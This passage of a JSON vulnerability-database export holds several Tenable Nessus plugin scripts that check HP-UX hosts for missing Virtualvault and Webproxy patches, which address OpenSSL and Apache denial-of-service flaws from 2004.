["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30650.NASL", "href": "https://www.tenable.com/plugins/nessus/17534", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30650. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17534);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30650 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Webproxy server 2.0 update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30650 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30650 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30650\", \"PHSS_30949\", \"PHSS_31829\", \"PHSS_32363\", \"PHSS_33788\", \"PHSS_34204\", \"PHSS_35110\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"HP_Webproxy.HPWEB-PX-CORE\", version:\"A.02.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:49:25", "description": "s700_800 11.04 Virtualvault 4.6 OpenSSH update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30644 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30644.NASL", "href": "https://www.tenable.com/plugins/nessus/17529", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30644. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17529);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30644 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 OpenSSH update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30644 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/08\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30644 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30644\", \"PHSS_34567\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-OPENSSH\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:49:28", "description": "s700_800 11.04 Virtualvault 4.6 OWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30645 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30645.NASL", "href": "https://www.tenable.com/plugins/nessus/17530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30645. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17530);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30645 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 OWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30645 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/21\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30645 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30645\", \"PHSS_30947\", \"PHSS_31057\", \"PHSS_31826\", \"PHSS_32183\", \"PHSS_33397\", \"PHSS_34120\", \"PHSS_35108\", \"PHSS_35462\", \"PHSS_35557\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JAVA\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:12:42", "description": "s700_800 11.04 Virtualvault 4.5 IWS Update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with Apache running on HP-UX where the vulnerability could be exploited remotely to create a Denial of Service (DoS) or to bypass access restrictions.\n\n - A potential security vulnerability has been identified with HP-UX running Apache where the vulnerability could be exploited remotely to create a Denial of Service (DoS) or to execute arbitrary code.\n\n - A potential security vulnerability has been identified with Apache running on HP-UX where a buffer overflow could be exploited remotely to execute arbitrary code.\n\n - Two potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2).\n The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference.\n CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112. (HPSBUX01019 SSRT4717)", "cvss3": {}, "published": "2005-02-16T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30647 : s700_800 11.04 Virtualvault 4.5 IWS Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30647.NASL", "href": "https://www.tenable.com/plugins/nessus/17070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30647. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17070);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"HPSBUX01057\");\n script_xref(name:\"HP\", value:\"HPSBUX01068\");\n script_xref(name:\"HP\", value:\"HPSBUX01069\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30647 : s700_800 11.04 Virtualvault 4.5 IWS Update\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.5 IWS Update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with Apache running on HP-UX where the vulnerability\n could be exploited remotely to create a Denial of\n Service (DoS) or to bypass access restrictions.\n\n - A potential security vulnerability has been identified\n with HP-UX running Apache where the vulnerability could\n be exploited remotely to create a Denial of Service\n (DoS) or to execute arbitrary code.\n\n - A potential security vulnerability has been identified\n with Apache running on HP-UX where a buffer overflow\n could be exploited remotely to execute arbitrary code.\n\n - Two potential security vulnerabilities have been\n identified in OpenSSL by NISCC (224012/1 and 224012/2).\n The Common Vulnerabilities and Exposures project has\n referenced them as the following CAN-2004-0079, and\n CAN-2004-0112. The CERT summary is TA04-078A. 1. The\n do_change_cipher_spec function in OpenSSL allows remote\n attackers to cause a denial of service via a crafted\n SSL/TLS handshake that triggers a null dereference.\n CVE-2004-0079 2. The SSL/TLS handshaking, when using\n Kerberos ciphersuites, does not properly check the\n length of Kerberos tickets during a handshake, which\n allows remote attackers to cause a denial of service via\n a crafted SSL/TLS handshake that causes an out-of-bounds\n read. CVE-2004-0112. (HPSBUX01019 SSRT4717)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30647 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/01\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30647 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30647\", \"PHSS_31827\", \"PHSS_32141\", \"PHSS_34171\", \"PHSS_35104\", \"PHSS_35306\", \"PHSS_35458\", \"PHSS_35553\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VVOS-ADM-RUN\", version:\"A.04.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:14:35", "description": "s700_800 11.04 Virtualvault 4.7 OpenSSH update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30640 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30640.NASL", "href": "https://www.tenable.com/plugins/nessus/17525", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30640. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17525);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30640 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.7 OpenSSH update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30640 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/04\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30640 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30640\", \"PHSS_34566\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-OPENSSH\", version:\"A.04.70\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-27T14:56:00", "description": "s700_800 11.04 Virtualvault 4.6 IWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30643 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30643.NASL", "href": "https://www.tenable.com/plugins/nessus/17528", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30643. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17528);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30643 : HP-UX Running Apache, Remote Denial of Service 